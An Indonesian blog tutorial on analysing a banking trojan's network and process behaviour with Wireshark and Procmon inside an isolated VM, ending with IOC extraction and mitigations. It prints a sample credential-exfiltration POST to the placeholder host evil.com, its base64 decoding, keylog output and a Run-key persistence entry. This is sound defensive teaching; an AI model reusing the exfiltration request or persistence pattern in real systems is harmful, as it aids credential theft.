Hades Xploit
01HOME
02ARTICLES
03TOOLS
04TERMS
05PRIVACY
06DISCLAIMER
07LOGIN
08CTF

Xploit the Unknown // Defend the Known

LinkedInWebsiteContact
Back to Articles
highArticle

Analisis Trojan Perbankan menggunakan Wireshark & Procmon — Network Forensics

x0_Hades
22 May 2026
3 min read
Analisis Trojan Perbankan menggunakan Wireshark & Procmon — Network Forensics

Analisis Trojan Perbankan menggunakan Wireshark & Procmon — Network Forensics

Pendahuluan

Trojan perbankan (banking trojan) merupakan salah satu ancaman siber paling canggih yang menargetkan kredensial finansial korban. Malware seperti Zeus, TrickBot, dan Emotet tidak hanya mencuri data login, tetapi juga mampu menyuntikkan halaman palsu, memonitor keyboard, dan mengeksfiltrasi informasi sensitif ke server C2 (Command & Control). Untuk menganalisis perilaku trojan ini, seorang security researcher perlu mengkombinasikan network forensics menggunakan Wireshark dan process monitoring menggunakan Procmon. Artikel ini akan memandu Anda langkah demi langkah dalam melakukan analisis forensik terhadap trojan perbankan.

Lingkungan Analisis

Sebelum memulai, siapkan lingkungan yang aman:

  • Mesin virtual (VirtualBox/VMware) dengan OS Windows 10/11.
  • Alat bantu: Wireshark (versi terbaru), Procmon dari Sysinternals Suite, Process Hacker (opsional).
  • Pastikan VM terisolasi dari jaringan produksi — gunakan mode Host-Only atau NAT terisolasi.
  • Jalankan malware dalam sandbox atau snapshot yang dapat dikembalikan.

Langkah 1: Memulai Capture Wireshark

Buka Wireshark dan pilih interface yang terhubung ke internet (misal: Ethernet). Mulai capture dengan filter:

bash
tshark -i eth0 -w bank_trojan_traffic.pcap

Atau melalui GUI dengan mengklik ikon hiu biru. Pastikan Anda menangkap full packet tanpa truncation.

Langkah 2: Memonitor Aktivitas dengan Procmon

Jalankan Procmon dengan hak administrator. Gunakan filter awal untuk mengurangi noise:

text
Process Name is malware.exe (ganti sesuai nama sampel)
Include

Pada tab Event Menu > Filter Filter, masukkan kondisi:

  • Process Name is malware.exeInclude
  • Operation is Process CreateInclude
  • Operation is RegSetValueInclude
  • Operation is WriteFileInclude

Hapus filter default agar fokus pada malware.

Langkah 3: Menjalankan dan Mengamati

Jalankan sampel trojan di VM. Segera catat:

  • Proses baru yang muncul (misal: child process cmd.exe, powershell.exe).
  • Koneksi jaringan keluar.
  • File yang ditulis (biasanya .log, .txt, .ini).
  • Registry key yang dimodifikasi (misal: HKCU\Software\Microsoft\Windows\CurrentVersion\Run).

Langkah 4: Analisis Network Traffic dengan Wireshark

Setelah capture berhenti, analisis pcap dengan filter berikut:

Filter DNS Query

dns.qry.name contains "bank" or dns.qry.name contains "login"

Cari domain Domain Generation Algorithm (DGA) yang acak seperti xz3kld9b.ru.

Filter HTTP Request

http.request

Perhatikan metode POST yang mengirim data ke endpoint /gate.php, /api/collect.

Filter HTTPS (TLS Handshake)

tls.handshake.type == 1

Lihat Server Name Indication (SNI) untuk domain C2. Jika trojan menggunakan sertifikat self-signed, akan terlihat perbedaan.

Data Exfiltration

Gunakan Follow TCP Stream untuk melihat payload. Jika di-encode (Base64, XOR), kita perlu decode. Contoh payload POST:

text
POST /collect HTTP/1.1
Host: evil.com
Content-Type: application/x-www-form-urlencoded

data=ZXJyb3I6IHVzZXI6IGFkbWluIHBhc3M6IHBhc3N3b3JkMTIz

Decode Base64 tersebut:

bash
echo "ZXJyb3I6IHVzZXI6IGFkbWluIHBhc3M6IHBhc3N3b3JkMTIz" | base64 -d
# output: error: user: admin pass: password123

Ini menunjukkan keylogger mengirim kredensial.

Langkah 5: Correlate dengan Procmon

Bandingkan waktu koneksi jaringan (dari Wireshark) dengan event Procmon. Contoh:

  • Wireshark menunjukkan POST pada 12:34:56.789.
  • Procmon mencatat WriteFile ke C:\Users\mal\AppData\Roaming\log.txt pada 12:34:56.790.

File log.txt kemungkinan berisi data keylogging sebelum dikirim. Buka file tersebut:

text
[2025-02-12 12:34:50] KEY: a
[2025-02-12 12:34:51] KEY: b
[2025-02-12 12:34:52] KEY: @
...

Langkah 6: Ekstraksi Indikator Kompromi (IOC)

Buat IOC dari analisis:

  • File Hash (MD5/SHA256) dari sampel.
  • Domain/IP C2 dari DNS dan TCP stream.
  • Registry Key yang dibuat.
  • File path yang ditulis.

Contoh IOC:

yaml
iocs:
  - type: file
    path: C:\Users\admin\AppData\Roaming\keylog.dat
  - type: network
    ip: 45.33.32.156
    domain: xyz123.ddns.net
  - type: registry
    key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SvchostService
    value: "C:\Users\admin\malware.exe"

Mitigasi & Pencegahan

Setelah memahami perilaku trojan, terapkan langkah-langkah berikut:

  1. Network Segmentation – Pisahkan sistem finansial dari jaringan umum.
  2. Endpoint Detection & Response (EDR) – Gunakan solusi yang mampu mendeteksi process injection dan outbound connections mencurigakan.
  3. Awareness Training – Latih pengguna untuk tidak mengklik lampiran email mencurigakan.
  4. Application Whitelisting – Hanya izinkan aplikasi yang sah berjalan.
  5. Traffic Filtering – Blokir domain DGA atau IP publik yang tidak dikenal di perimeter.

Kesimpulan

Kombinasi Wireshark dan Procmon memberikan visibilitas menyeluruh terhadap aktivitas trojan perbankan — baik di lapisan jaringan maupun sistem operasi. Dengan memahami pola traffic dan behavior process, analis dapat mengidentifikasi, mengekstraksi IOC, dan merumuskan countermeasure. Semakin dalam analisis, semakin sulit bagi penyerang untuk lolos dari deteksi.

Selamat berforensik, dan jangan lupa selalu bekerja di lingkungan yang aman!